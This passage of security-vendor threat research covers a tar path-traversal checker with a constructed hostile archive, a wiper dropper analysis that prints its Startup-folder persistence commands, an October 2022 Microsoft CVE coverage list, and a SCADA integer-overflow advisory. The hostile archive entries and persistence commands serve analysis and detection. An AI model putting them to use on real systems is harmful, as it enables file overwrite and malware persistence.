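    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload, kind in entries:
            info = tarfile.TarInfo(name)
            if kind == "file":
                data = payload.encode()
                info.size = len(data)
                tf.addfile(info, io.BytesIO(data))
            else:  # "symlink": payload is the link target
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tf.addfile(info)
    return buf.getvalue()


# Constructed samples: a benign archive, and one with a traversal entry plus a
# symlink whose target lies outside the destination
BENIGN_TAR = _build_tar([("docs/readme.txt", "hello", "file")])
HOSTILE_TAR = _build_tar([
    ("docs/readme.txt", "hello", "file"),
    ("../../escaped.txt", "x", "file"),
    ("docs/link", "/outside/target", "symlink"),
])

if __name__ == "__main__":
    print("benign safe:", is_safe(BENIGN_TAR))
    for name, reason in unsafe_members(HOSTILE_TAR):
        print(f"reject {name}: {reason}")
```

The check refuses the whole archive on the first bad member rather than skipping that member, because a link entry that is extracted before a later entry can redirect the later entry's write; deciding per member is exactly what the vulnerable extraction did.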

 

SonicWall Capture Labs provides protection against this threat via following signatures:

  • ASPY 374: Malformed-File tar.OT_1
  • ASPY 379: Malformed-File tar.OT_2
  • GAV CVE-2022-41352.A
  • GAV CVE-2022-41352.A_1

Zimbra has patched this vulnerability.

IoCs
416eba12bc12fe14de62c8a21e2f4c73b017286381a44bc70ef6f73ee6aba8c9
094f2d7d11c612d470d6c8943585b860a42eac7fff974d0a41d5f9cf0906bbd7
c76489fa4cfef22695b9ac66942b3884f52dccf297566482ea48574114613831
b73f4f79e65bb804dae0962ebc5ba6657a4499847bacd4670b3e5ba14e2c7ef2

Fake picture installs a data wiper malware

The SonicWall Capture Labs Research team came across a malware sample that purports to be a picture but is intended to wipe the hard drive, deleting data and programs. It is a multi-component infection that starts with a fake image, which then drops several files to carry out the malicious behavior.

Infection cycle:

The malware arrives as a picture entitled “SexyPhotos.jpg”.

This is in fact a self-extracting archive that drops the following files:

  • %temp%/avtstart.bat
  • %temp%/del.exe
  • %temp%/windll.exe
  • %temp%/open.exe
  • %temp%/windowss.exe

It ensures persistence by executing avtstart.bat and adding the rest of the files into Startup.

copy dell.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy windowss.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy windll.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy open.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

The other dropped executables are also self-extracting archives, each of which drops a batch file and a VBS file to continue the infection.

Each of the files was executed successively as follows:

Windowss.exe drops the following files:

  • windowss.bat
  • windowss.vbs
  • readme.txt (a ransom note)

The VBS file, windowss.vbs, contains a simple command that uses wscript.exe (the Microsoft Windows Script Host utility for executing scripts) to execute the batch file windowss.bat.

This batch file then renames every targeted file on the victim’s machine to “Locked_!counter!.Locked_fille.”

These files appear encrypted, as if ransomware had locked them, but they were simply renamed, as in the screenshot below.

Windll.exe drops the following files:

  • windll.bat
  • windll.vbs
  • readme.txt (a copy of the ransom note)

These files executed similarly with the vbs calling wscript exe to execute the batch file. Windll.bat copies readme.txt into the directories where the locked files are.

Open.exe then drops the following files:

  • open.bat
  • open.vbs
  • open.txt

Again, the open.vbs script runs wscript to execute open.bat. This time the only purpose is to open a URL (that is currently down) and to open the readme.txt which contains instructions on how to unlock the seemingly locked files by paying cryptocurrency worth $300 to a bitcoin address.

However, the infection cycle ends here. The original malware then looks for “dell.exe”, which does not exist because the dropped file was named “del.exe” with a single ‘l’. Had the name not been misspelled, the infection would have continued; instead, an error message was shown.

Del.exe should have dropped the following files:

  • del.bat
  • del.vbs
  • del.txt

Del.vbs would have executed del.bat using wscript.exe, which would have wiped the victim’s machine, deleting all data on the drive.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Ransom.FK (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for October 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-37970 Windows DWM Core Library Elevation of Privilege Vulnerability
ASPY 369: Malformed-File exe.MP_275

CVE-2022-37974 Windows Mixed Reality Developer Tools Information Disclosure Vulnerability
ASPY 370: Malformed-File exe.MP_276

CVE-2022-37987 Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability
ASPY 371: Malformed-File exe.MP_277

CVE-2022-37989 Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability
ASPY 377: Malformed-File exe.MP_280

CVE-2022-38050 Win32k Elevation of Privilege Vulnerability
ASPY 372: Malformed-File exe.MP_278

CVE-2022-38051 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 373: Malformed-File exe.MP_279

CVE-2022-38053 Microsoft SharePoint Server Remote Code Execution Vulnerability
IPS 15500: Microsoft SharePoint Remote Code Execution (CVE-2022-38053)

Adobe Coverage:
CVE-2022-28851 Acrobat Reader Out-of-bounds Read
ASPY 376: Malformed-File pdf.MP_560

CVE-2022-38449 Acrobat Reader Out-of-bounds Read
ASPY 375: Malformed-File pdf.MP_559

The following vulnerabilities do not have exploits in the wild:
CVE-2022-22035 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-24504 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30198 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33634 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33635 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33645 Windows TCP/IP Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-34689 Windows CryptoAPI Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-35770 Windows NTLM Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-35829 Service Fabric Explorer Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-37965 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37968 Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37971 Microsoft Windows Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37973 Windows Local Session Manager (LSM) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37975 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37976 Active Directory Certificate Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37977 Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37978 Windows Active Directory Certificate Services Security Feature Bypass
There are no known exploits in the wild.
CVE-2022-37979 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37980 Windows DHCP Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37981 Windows Event Logging Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37982 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-37983 Microsoft DWM Core Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37984 Windows WLAN Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37985 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-37986 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37988 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37990 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37991 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37993 Windows Group Policy Preference Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37994 Windows Group Policy Preference Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37995 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37996 Windows Kernel Memory Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-37997 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37998 Windows Local Session Manager (LSM) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37999 Windows Group Policy Preference Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38000 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38001 Microsoft Office Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-38003 Windows Resilient File System Elevation of Privilege
There are no known exploits in the wild.
CVE-2022-38016 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38017 StorSimple 8000 Series Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38021 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38022 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38025 Windows Distributed File System (DFS) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38026 Windows DHCP Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38027 Windows Storage Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38028 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38029 Windows ALPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38030 Windows USB Serial Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38031 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38032 Windows Portable Device Enumerator Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-38033 Windows Server Remotely Accessible Registry Keys Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38034 Windows Workstation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38036 Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-38037 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38038 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38039 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38040 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38041 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-38042 Active Directory Domain Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38043 Windows Security Support Provider Interface Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38044 Windows CD-ROM File System Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38045 Server Service Remote Protocol Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38046 Web Account Manager Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38047 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38048 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38049 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41031 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41032 NuGet Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41033 Windows COM+ Event System Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41034 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41036 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41037 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41038 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41042 Visual Studio Code Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41043 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41081 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.

Schneider Electric IGSS Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Schneider Electric’s Interactive Graphical Supervisory Control and Data Acquisition (SCADA) System (IGSS) is used for monitoring and controlling industrial processes. According to the vendor, more than 28,000 IGSS licenses have been sold around the world and IGSS is installed in many different industries, including the Oil and Gas, Traffic Control, and Waste Water industries.

  An integer overflow vulnerability exists in Schneider Electric IGSS. The vulnerability is due to an input validation error when processing the ALMNOTE opcode.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could cause a denial of service and potentially remote code execution.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-2329.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to the missing validation of the size field in the request sent to the server. When the data server receives a message, the function IGSSdataServer.exe+0xb30b0() is called, which calls the Winsock API function WSARecv() to retrieve the contents of the message from the socket. Later, in the same function, the code checks that Opcode1 is equal to 1. If it is not, the function exits. If it is, the code executes a switch statement on the value of the Request Type field and enters the appropriate code path.

  If the Request Type field is equal to 14, execution enters the potentially vulnerable code path. The code calls the function IGSSdataServer+0xf7650(). This function is called through a function pointer that is set only after the first request, so it is only reached on the second or a subsequent request. Inside this function, the code calls the C library function realloc() with the size parameter set to the sum of the size field from the previous request and the size field from the current request. This addition is not validated, so the computed size can overflow.

  Next, the code calls the C library function memcpy() to copy the "note" data field from the current request into the newly reallocated heap buffer, which may be smaller than intended because of the integer overflow. The code keeps track of the value of the size field from the previous request in another heap buffer. Since the reallocated buffer can be too small to hold the "note" data field of the current request, a heap buffer overflow can ensue.
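The size arithmetic described above, as an added illustration that is not Schneider Electric's code: `naive_alloc_size` models the unchecked addition of the previous and current size fields, and `checked_alloc_size` / `append_note` show the validation that would prevent the undersized reallocation. The 32-bit field width, the identifier names and the 64 KiB cap are assumptions.

```c
/* Added example, not Schneider Electric's code: models the size arithmetic the
 * advisory describes (previous request's size field + current one, passed to
 * realloc) beside a checked form. Field widths, names and the cap are assumed. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define NOTE_MAX_TOTAL (64u * 1024u)  /* assumed upper bound for accumulated note data */
typedef struct {
    unsigned char *data;
    uint32_t len;  /* bytes accumulated from previous note requests */
} note_buffer;

/* Unchecked arithmetic as described in the advisory: the sum wraps modulo 2^32,
 * so two large size fields yield a small allocation. */
uint32_t naive_alloc_size(uint32_t prev_size, uint32_t cur_size)
{
    return prev_size + cur_size;
}

/* Hardened form: reject the request before any allocation or copy if the sum
 * would wrap or exceed the cap. Returns 0 on success, -1 on error. */
int checked_alloc_size(uint32_t prev_size, uint32_t cur_size, uint32_t *out)
{
    if (cur_size > UINT32_MAX - prev_size)      /* addition would wrap */
        return -1;
    if (prev_size + cur_size > NOTE_MAX_TOTAL)  /* larger than the protocol needs */
        return -1;
    *out = prev_size + cur_size;
    return 0;
}

/* Append one request's note payload to the accumulated buffer. The copy only
 * happens once the grown buffer is known to hold prev + cur bytes. */
int append_note(note_buffer *nb, const unsigned char *note, uint32_t note_len)
{
    uint32_t new_len;
    if (note_len == 0)
        return 0;
    if (checked_alloc_size(nb->len, note_len, &new_len) != 0)
        return -1;
    unsigned char *grown = realloc(nb->data, new_len);
    if (grown == NULL)
        return -1;
    memcpy(grown + nb->len, note, note_len);
    nb->data = grown;
    nb->len = new_len;
    return 0;
}
```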

  IGSS Data Server

Triggering the Problem:

  • The target must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the server running the vulnerable product.

Triggering Conditions:

  A remote attacker sends three crafted packets with Request Type set to 14. The vulnerability is triggered when the affected product parses the malicious requests.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • 7-Technologies (7T) IGSS Protocol


SonicWall's Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 3304 Schneider Electric IGSS Integer Overflow

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate the vulnerability.
    • Filtering attack traffic using the signature above.
  The vendor, Schneider Electric, has released an update and advisory regarding this vulnerability:
  Vendor Advisory